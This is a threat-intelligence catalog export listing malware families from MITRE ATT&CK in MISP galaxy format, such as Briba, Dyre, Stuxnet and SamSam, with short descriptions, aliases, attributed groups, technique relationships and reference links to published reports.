Briba - S0204

[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)

The tag is: misp-galaxy:mitre-malware="Briba - S0204"

Briba - S0204 is also known as:

  • Briba

Briba - S0204 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7295. Table References

Links

https://attack.mitre.org/software/S0204

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99

Dvmap - S0420

[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)

The tag is: misp-galaxy:mitre-malware="Dvmap - S0420"

Dvmap - S0420 is also known as:

  • Dvmap

Table 7296. Table References

Links

https://attack.mitre.org/software/S0420

https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/

Dyre - S0024

[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)

The tag is: misp-galaxy:mitre-malware="Dyre - S0024"

Dyre - S0024 is also known as:

  • Dyre

  • Dyzap

  • Dyreza

Dyre - S0024 has relationships with:

  • similar: misp-galaxy:banker="Dyre" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063" with estimative-language:likelihood-probability="almost-certain"

Table 7297. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf

https://attack.mitre.org/software/S0024

https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/

CALENDAR - S0025

[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="CALENDAR - S0025"

CALENDAR - S0025 is also known as:

  • CALENDAR

CALENDAR - S0025 has relationships with:

  • similar: misp-galaxy:tool="CALENDAR" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7298. Table References

Links

https://attack.mitre.org/software/S0025

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

BLINDINGCAN - S0520

[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)

The tag is: misp-galaxy:mitre-malware="BLINDINGCAN - S0520"

BLINDINGCAN - S0520 is also known as:

  • BLINDINGCAN

Table 7299. Table References

Links

https://attack.mitre.org/software/S0520

https://digital.nhs.uk/cyber-alerts/2020/cc-3603

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

OnionDuke - S0052

[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="OnionDuke - S0052"

OnionDuke - S0052 is also known as:

  • OnionDuke

OnionDuke - S0052 has relationships with:

  • similar: misp-galaxy:malpedia="OnionDuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7300. Table References

Links

https://attack.mitre.org/software/S0052

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Drovorub - S0502

[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprising an agent, client, server, and kernel modules that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)

The tag is: misp-galaxy:mitre-malware="Drovorub - S0502"

Drovorub - S0502 is also known as:

  • Drovorub

Table 7301. Table References

Links

https://attack.mitre.org/software/S0502

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

Naid - S0205

[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)

The tag is: misp-galaxy:mitre-malware="Naid - S0205"

Naid - S0205 is also known as:

  • Naid

Naid - S0205 has relationships with:

  • similar: misp-galaxy:tool="Trojan.Naid" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 7302. Table References

Links

https://attack.mitre.org/software/S0205

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99

GLOOXMAIL - S0026

[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="GLOOXMAIL - S0026"

GLOOXMAIL - S0026 is also known as:

  • GLOOXMAIL

  • Trojan.GTALK

GLOOXMAIL - S0026 has relationships with:

  • similar: misp-galaxy:tool="GLOOXMAIL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7303. Table References

Links

https://attack.mitre.org/software/S0026

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Circles - S0602

[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company’s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)

The tag is: misp-galaxy:mitre-malware="Circles - S0602"

Circles - S0602 is also known as:

  • Circles

Table 7304. Table References

Links

https://attack.mitre.org/software/S0602

https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/

DustySky - S0062

[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)

The tag is: misp-galaxy:mitre-malware="DustySky - S0062"

DustySky - S0062 is also known as:

  • DustySky

  • NeD Worm

DustySky - S0062 has relationships with:

  • similar: misp-galaxy:tool="NeD Worm" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7305. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

https://attack.mitre.org/software/S0062

https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

InvisiMole - S0260

[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-malware="InvisiMole - S0260"

InvisiMole - S0260 is also known as:

  • InvisiMole

Table 7306. Table References

Links

https://attack.mitre.org/software/S0260

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Wiarp - S0206

[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)

The tag is: misp-galaxy:mitre-malware="Wiarp - S0206"

Wiarp - S0206 is also known as:

  • Wiarp

Wiarp - S0206 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7307. Table References

Links

https://attack.mitre.org/software/S0206

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99

OwaAuth - S0072

[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="OwaAuth - S0072"

OwaAuth - S0072 is also known as:

  • OwaAuth

OwaAuth - S0072 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7308. Table References

Links

https://attack.mitre.org/software/S0072

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

RogueRobin - S0270

[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)

The tag is: misp-galaxy:mitre-malware="RogueRobin - S0270"

RogueRobin - S0270 is also known as:

  • RogueRobin

Table 7309. Table References

Links

https://attack.mitre.org/software/S0270

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

Vasport - S0207

[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)

The tag is: misp-galaxy:mitre-malware="Vasport - S0207"

Vasport - S0207 is also known as:

  • Vasport

Vasport - S0207 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7310. Table References

Links

https://attack.mitre.org/software/S0207

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99

Zeroaccess - S0027

[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)

The tag is: misp-galaxy:mitre-malware="Zeroaccess - S0027"

Zeroaccess - S0027 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7311. Table References

Links

https://attack.mitre.org/software/S0027

https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf

SHIPSHAPE - S0028

[SHIPSHAPE](https://attack.mitre.org/software/S0028) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="SHIPSHAPE - S0028"

SHIPSHAPE - S0028 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 7312. Table References

Links

https://attack.mitre.org/software/S0028

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Emissary - S0082

[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)

The tag is: misp-galaxy:mitre-malware="Emissary - S0082"

Emissary - S0082 is also known as:

  • Emissary

Emissary - S0082 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7313. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/

https://attack.mitre.org/software/S0082

MirageFox - S0280

[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)

The tag is: misp-galaxy:mitre-malware="MirageFox - S0280"

MirageFox - S0280 is also known as:

  • MirageFox

Table 7314. Table References

Links

https://attack.mitre.org/software/S0280

https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Pasam - S0208

[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)

The tag is: misp-galaxy:mitre-malware="Pasam - S0208"

Pasam - S0208 is also known as:

  • Pasam

Pasam - S0208 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7315. Table References

Links

https://attack.mitre.org/software/S0208

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99

Darkmoon - S0209

The tag is: misp-galaxy:mitre-malware="Darkmoon - S0209"

Darkmoon - S0209 has relationships with:

  • similar: misp-galaxy:malpedia="Darkmoon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 7316. Table References

Links

https://attack.mitre.org/software/S0209

Gooligan - S0290

[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)

The tag is: misp-galaxy:mitre-malware="Gooligan - S0290"

Gooligan - S0290 is also known as:

  • Gooligan

  • Ghost Push

Gooligan - S0290 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

Table 7317. Table References

Links

http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/

https://attack.mitre.org/software/S0290

https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/

https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi

MazarBOT - S0303

[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)

The tag is: misp-galaxy:mitre-malware="MazarBOT - S0303"

MazarBOT - S0303 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 7318. Table References

Links

https://attack.mitre.org/software/S0303

https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/

NetTraveler - S0033

[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)

The tag is: misp-galaxy:mitre-malware="NetTraveler - S0033"

NetTraveler - S0033 is also known as:

  • NetTraveler

NetTraveler - S0033 has relationships with:

  • similar: misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="NetTraveler" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 7319. Table References

Links

http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf

https://attack.mitre.org/software/S0033

BUBBLEWRAP - S0043

[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-malware="BUBBLEWRAP - S0043"

BUBBLEWRAP - S0043 is also known as:

  • BUBBLEWRAP

  • Backdoor.APT.FakeWinHTTPHelper

BUBBLEWRAP - S0043 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7320. Table References

Links

https://attack.mitre.org/software/S0043

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

NETEAGLE - S0034

[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="NETEAGLE - S0034"

NETEAGLE - S0034 is also known as:

  • NETEAGLE

NETEAGLE - S0034 has relationships with:

  • similar: misp-galaxy:malpedia="NETEAGLE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 7321. Table References

Links

https://attack.mitre.org/software/S0034

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Octopus - S0340

[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)

The tag is: misp-galaxy:mitre-malware="Octopus - S0340"

Octopus - S0340 is also known as:

  • Octopus

Table 7322. Table References

Links

https://attack.mitre.org/software/S0340

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Riltok - S0403

[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)

The tag is: misp-galaxy:mitre-malware="Riltok - S0403"

Riltok - S0403 is also known as:

  • Riltok

Table 7323. Table References

Links

https://attack.mitre.org/software/S0403

https://securelist.com/mobile-banker-riltok/91374/

SPACESHIP - S0035

[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="SPACESHIP - S0035"

SPACESHIP - S0035 is also known as:

  • SPACESHIP

SPACESHIP - S0035 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 7324. Table References

Links

https://attack.mitre.org/software/S0035

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SeaDuke - S0053

[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="SeaDuke - S0053"

SeaDuke - S0053 is also known as:

  • SeaDuke

  • SeaDaddy

  • SeaDesk

SeaDuke - S0053 has relationships with:

  • similar: misp-galaxy:malpedia="SEADADDY" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7325. Table References

Links

https://attack.mitre.org/software/S0053

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

FrameworkPOS - S0503

[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from systems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)

The tag is: misp-galaxy:mitre-malware="FrameworkPOS - S0503"

FrameworkPOS - S0503 is also known as:

  • FrameworkPOS

  • Trinity

Table 7326. Table References

Links

https://attack.mitre.org/software/S0503

https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/

Melcoz - S0530

[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Melcoz - S0530"

Melcoz - S0530 is also known as:

  • Melcoz

Table 7327. Table References

Links

https://attack.mitre.org/software/S0530

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

zwShell - S0350

[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon)

The tag is: misp-galaxy:mitre-malware="zwShell - S0350"

zwShell - S0350 is also known as:

  • zwShell

Table 7328. Table References

Links

https://attack.mitre.org/software/S0350

https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf

BONDUPDATER - S0360

[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)

The tag is: misp-galaxy:mitre-malware="BONDUPDATER - S0360"

BONDUPDATER - S0360 is also known as:

  • BONDUPDATER

Table 7329. Table References

Links

https://attack.mitre.org/software/S0360

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

FLASHFLOOD - S0036

[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="FLASHFLOOD - S0036"

FLASHFLOOD - S0036 is also known as:

  • FLASHFLOOD

FLASHFLOOD - S0036 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 7330. Table References

Links

https://attack.mitre.org/software/S0036

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SHOTPUT - S0063

[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)

The tag is: misp-galaxy:mitre-malware="SHOTPUT - S0063"

SHOTPUT - S0063 is also known as:

  • SHOTPUT

  • Backdoor.APT.CookieCutter

  • Pirpi

SHOTPUT - S0063 has relationships with:

  • similar: misp-galaxy:tool="Pirpi" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7331. Table References

Links

https://attack.mitre.org/software/S0063

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

Nebulae - S0630

[Nebulae](https://attack.mitre.org/software/S0630) is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)

The tag is: misp-galaxy:mitre-malware="Nebulae - S0630"

Nebulae - S0630 is also known as:

  • Nebulae

Table 7332. Table References

Links

https://attack.mitre.org/software/S0630

https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

Stuxnet - S0603

[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)

The tag is: misp-galaxy:mitre-malware="Stuxnet - S0603"

Stuxnet - S0603 is also known as:

  • Stuxnet

  • W32.Stuxnet

Table 7333. Table References

Links

https://attack.mitre.org/software/S0603

https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01

https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf

HAMMERTOSS - S0037

[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="HAMMERTOSS - S0037"

HAMMERTOSS - S0037 is also known as:

  • HAMMERTOSS

  • HammerDuke

  • NetDuke

HAMMERTOSS - S0037 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7334. Table References

Links

https://attack.mitre.org/software/S0037

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

ASPXSpy - S0073

[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="ASPXSpy - S0073"

ASPXSpy - S0073 is also known as:

  • ASPXSpy

  • ASPXTool

ASPXSpy - S0073 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 7335. Table References

Links

https://attack.mitre.org/software/S0073

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

SamSam - S0370

[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)

The tag is: misp-galaxy:mitre-malware="SamSam - S0370"

SamSam - S0370 is also known as:

  • SamSam

  • Samas

Table 7336. Table References

Links

https://attack.mitre.org/software/S0370

https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf

https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks

https://www.us-cert.gov/ncas/alerts/AA18-337A

StoneDrill - S0380

[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-malware="StoneDrill - S0380"

StoneDrill - S0380 is also known as:

  • StoneDrill

  • DROPSHOT

Table 7337. Table References

Links

https://attack.mitre.org/software/S0380

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

